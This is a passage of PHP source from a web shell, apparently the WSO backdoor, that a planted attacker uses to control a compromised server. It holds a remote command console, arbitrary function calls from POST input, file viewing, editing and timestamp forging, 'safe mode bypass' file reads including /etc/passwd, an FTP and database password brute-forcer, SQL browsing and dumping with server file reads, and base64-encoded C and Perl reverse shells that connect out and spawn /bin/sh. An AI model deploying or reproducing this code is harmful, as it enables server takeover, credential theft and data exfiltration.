 printFooter(); } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}} if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}} if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}} if(isset($_POST['ajax'])) { $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; ob_start(); if(function_exists($_POST['p1'])) echo $_POST['p1']($_POST['p2']); $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"

	\'")."';
"; echo strlen($temp), "
", $temp; exit; } printHeader(); echo '<h1>String conversions</h1><div class=content>'; $stringTools = array( 'Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'bin2hex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', ); if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; foreach($stringTools as $k => $v) echo "<option value='".htmlspecialchars($v)."'>".$k."</option>"; echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>"; if(!empty($_POST['p1'])) { if(function_exists($_POST['p1']))echo htmlspecialchars($_POST['p1']($_POST['p2'])); } echo"</pre></div>"; ?>
	<br><h1>Search text in files:</h1><div class=content>
		<form onsubmit="g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;"><table cellpadding="1" cellspacing="0" width="50%">
			<tr><td width="1%">Text:</td><td><input type="text" name="text" style="width:100%"></td></tr>
			<tr><td>Path:</td><td><input type="text" name="cwd" value="<?php echo htmlspecialchars($GLOBALS['cwd'])?>" style="width:100%"></td></tr>
			<tr><td>Name:</td><td><input type="text" name="filename" value="*" style="width:100%"></td></tr>
			<tr><td></td><td><input type="submit" value=">>"></td></tr>
			</table>
		</form>
	<?php
 function recursiveGlob($path) { if(substr($path, -1) != '/') $path.='/'; $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); if(is_array($paths)&&@count($paths)) { foreach($paths as $item) { if(@is_dir($item)){ if($path!=$item) recursiveGlob($item); } else { if(@strpos(@file_get_contents($item), @$_POST['p2'])!==false) echo "<a href='#' onclick='g(\"FilesTools\",null,\"$item\", \"view\")'>$item</a><br>"; } } } } if(@$_POST['p3']) recursiveGlob($_POST['c']); ?>
	</div>
	<br><h1>Search for hash:</h1><div class=content>
		<form method='post' target='_blank' name="hf">
			<input type="text" name="hash" style="width:200px;"><br>
			<input type="button" value="hashcrack.com" onclick="document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()"><br>
			<input type="button" value="milw0rm.com" onclick="document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()"><br>
			<input type="button" value="hashcracking.info" onclick="document.hf.action='https://hashcracking.info/index.php';document.hf.submit()"><br>
			<input type="button" value="md5.rednoize.com" onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br>
			<input type="button" value="md5decrypter.com" onclick="document.hf.action='http://www.md5decrypter.com/';document.hf.submit()"><br>
		</form>
	</div>
	<?php
 printFooter(); } function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: ".$type); } $fp = @fopen($_POST['p1'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } printHeader(); echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); if(!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @fileowner($_POST['p1']); } else $gid = @posix_getgrgid(@fileowner($_POST['p1'])); echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>'; echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> '; echo '<br><br>'; switch($_POST['p2']) { case 'view': echo '<pre class=ml1>'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</pre>'; break; case 'highlight': if( @is_readable($_POST['p1']) ) { echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; $code = @highlight_file($_POST['p1'],true); echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>'; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; } clearstatcache(); echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { $time = @filemtime($_POST['p1']); $_POST['p3'] = substr($_POST['p3'],1); $fp = @fopen($_POST['p1'],"w"); if($fp) { @fwrite($fp,$_POST['p3']); @fclose($fp); echo 'Saved!<br><script>p3_="";</script>'; @touch($_POST['p1'],$time,$time); } } echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</textarea><input type=submit value=">>"></form>'; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000<br>','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';} $h[1] .= '<br>'; $h[2] .= "
"; } } echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>'; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!<br>'; else die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>'); } echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>'; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>'; break; } echo '</div>'; printFooter(); } function actionSafeMode() { $temp=''; ob_start(); switch($_POST['p1']) { case 1: $temp=@tempnam($test, 'cx'); if(@copy("compress.zlib://".$_POST['p2'], $temp)){ echo @file_get_contents($temp); unlink($temp); } else echo 'Sorry... Can\'t open file'; break; case 2: $files = glob($_POST['p2'].'*'); if( is_array($files) ) foreach ($files as $filename) echo $filename."
"; break; case 3: $ch = curl_init("file://".$_POST['p2']."".SELF_PATH); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include($_POST['p2']); break; case 5: for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { $uid = @posix_getpwuid($_POST['p2']); if ($uid) echo join(':',$uid)."
"; } break; case 6: if(!function_exists('imap_open'))break; $stream = imap_open($_POST['p2'], "", ""); if ($stream == FALSE) break; echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); printHeader(); echo '<h1>Safe mode bypass</h1><div class=content>'; echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>'; if($temp) echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>'; echo '</div>'; printFooter(); } function actionConsole() { if(isset($_POST['ajax'])) { $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; ob_start(); echo "document.cf.cmd.value='';
"; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("
$ ".$_POST['p1']."
".ex($_POST['p1']),"

	\'")); if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "document.mf.c.value='".$GLOBALS['cwd']."';"; } } echo "document.cf.output.value+='".$temp."';"; echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "
", $temp; exit; } printHeader(); ?>
<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array("");
var cur = 0;
function kp(e) {
	var n = (window.Event) ? e.which : e.keyCode;
	if(n == 38) {
		cur--;
		if(cur>=0)
			document.cf.cmd.value = cmds[cur];
		else
			cur++;
	} else if(n == 40) {
		cur++;
		if(cur < cmds.length)
			document.cf.cmd.value = cmds[cur];
		else
			cur--;
	}
}
function add(cmd) {
	cmds.pop();
	cmds.push(cmd);
	cmds.push("");
	cur = cmds.length-1;
}
</script>
<?php
 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>'; foreach($GLOBALS['aliases'] as $n => $v) { if($v == '') { echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>'; continue; } echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>'; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; if(!empty($_POST['p1'])) { echo htmlspecialchars("$ ".$_POST['p1']."
".ex($_POST['p1'])); } echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">'; echo '</form></div><script>document.cf.cmd.focus();</script>'; printFooter(); } function actionLogout() { unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); echo 'bye!'; } function actionSelfRemove() { printHeader(); if($_POST['p1'] == 'yes') { if(@unlink(SELF_PATH)) die('Shell has been removed'); else echo 'unlink error!'; } echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; printFooter(); } function actionBruteforce() { printHeader(); if( isset($_POST['proto']) ) { echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>'; if( $_POST['proto'] == 'ftp' ) { function bruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST['proto'] == 'mysql' ) { function bruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST['proto'] == 'pgsql' ) { function bruteForce($ip,$port,$login,$pass) { $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST['server']); if($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(":", $line); ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>'; } if(@$_POST['reverse']) { $tmp = ""; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp); } } } } elseif($_POST['type'] == 2) { $temp = @file($_POST['dict']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) { $success++; echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>'; } } } echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>"; } echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">' .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">' .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">' .'<span>Server:port</span></td>' .'<td><input type=text name=server value="127.0.0.1"></td></tr>' .'<tr><td><span>Brute type</span></td>' .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' .'<td><input type=text name=login value="root"></td></tr>' .'<tr><td><span>Dictionary</span></td>' .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>' .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>'; echo '</div><br>'; printFooter(); } function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case 'mysql': return $this->res = @mysql_list_dbs($this->link); break; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database"); break; } return false; } function listTables() { switch($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_shadow'"); break; } return false; } function error() { switch($this->type) { case 'mysql': return @mysql_error($this->link); break; case 'pgsql': return @pg_last_error($this->link); break; } return false; } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET '.$str); break; case 'pgsql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); break; case 'pgsql': $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;"); $r=array(); while($i=$this->fetch()) $r[] = $i['file']; $this->query('drop table wso2'); return array('file'=>implode("
",$r)); break; } return false; } function dump($table) { switch($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); $create = mysql_fetch_array($res); echo $create[1].";

"; $this->query('SELECT * FROM `'.$table.'`'); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = "'".@mysql_real_escape_string($v)."'"; $columns[] = "`".$k."`"; } echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."
"; } break; case 'pgsql': $this->query('SELECT * FROM '.$table); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = "'".addslashes($v)."'"; $columns[] = $k; } echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."
"; } break; } return false; } }; $db = new DbClass($_POST['type']); if(@$_POST['p2']=='download') { ob_start("ob_gzhandler", 4096); $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db->selectdb($_POST['sql_base']); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach($_POST['tbl'] as $v) $db->dump($v); exit; } printHeader(); ?>
<h1>Sql browser</h1><div class=content>
<form name="sf" method="post"><table cellpadding="2" cellspacing="0"><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2><input type=hidden name=c value='<?php echo htmlspecialchars($GLOBALS['cwd']);?>'><input type=hidden name=charset value='<?php echo isset($_POST['charset'])?$_POST['charset']:''?>'>
<td><select name='type'><option value="mysql" <?php if(@$_POST['type']=='mysql')echo 'selected';?>>MySql</option><option value="pgsql" <?php if(@$_POST['type']=='pgsql')echo 'selected';?>>PostgreSql</option></select></td>
<td><input type=text name=sql_host value='<?php echo (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));?>'></td>
<td><input type=text name=sql_login value='<?php echo (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));?>'></td>
<td><input type=text name=sql_pass value='<?php echo (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));?>'></td>
<td>
	<?php
 $tmp = "<input type=text name=sql_base value=''>"; if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } $db->listDbs(); echo "<select name=sql_base><option value=''></option>"; while($item = $db->fetch()) { list($key, $value) = each($item); echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>'; } echo '</select>'; } else echo $tmp; }else echo $tmp; ?></td>
				<td><input type=submit value=">>"></td>
			</tr>
		</table>
		<script>
			function st(t,l) {
				document.sf.p1.value = 'select';
				document.sf.p2.value = t;
				if(l!=null)document.sf.p3.value = l;
				document.sf.submit();
			}
			function is() {
				for(i=0;i<document.sf.elements['tbl[]'].length;++i)
					document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked;
			}
		</script>
	<?php
 if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']); echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>"; $tbls_res = $db->listTables(); while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); $value = htmlspecialchars($value); echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>"; } echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>"; if(@$_POST['p1'] == 'select') { $_POST['p1'] = 'query'; $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].''); $num = $db->fetch(); $num = $num['n']; echo "<span>".$_POST['p2']."</span> ($num) "; for($i=0;$i<($num/30);$i++) if($i != (int)$_POST['p3']) echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> "; else echo ($i+1)," "; if($_POST['type']=='pgsql') $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); else $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; echo "<br><br>"; } if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) { $db->query(@$_POST['p3']); if($db->res !== false) { $title = false; echo '<table width=100% cellspacing=0 cellpadding=2 class=main>'; $line = 1; while($item = $db->fetch()) { if(!$title) { echo '<tr>'; foreach($item as $key => $value) echo '<th>'.$key.'</th>'; reset($item); $title=true; echo '</tr><tr>'; $line = 2; } echo '<tr class="l'.$line.'">'; $line = $line==1?2:1; foreach($item as $key => $value) { if($value == null) echo '<td><i>null</i></td>'; else echo '<td>'.nl2br(htmlspecialchars($value)).'</td>'; } echo '</tr>'; } echo '</table>'; } else { echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>'; } } echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>"; echo "</td></tr>"; } echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; if(@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>'; } } echo '</div>'; printFooter(); } function actionNetwork() { printHeader(); $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; 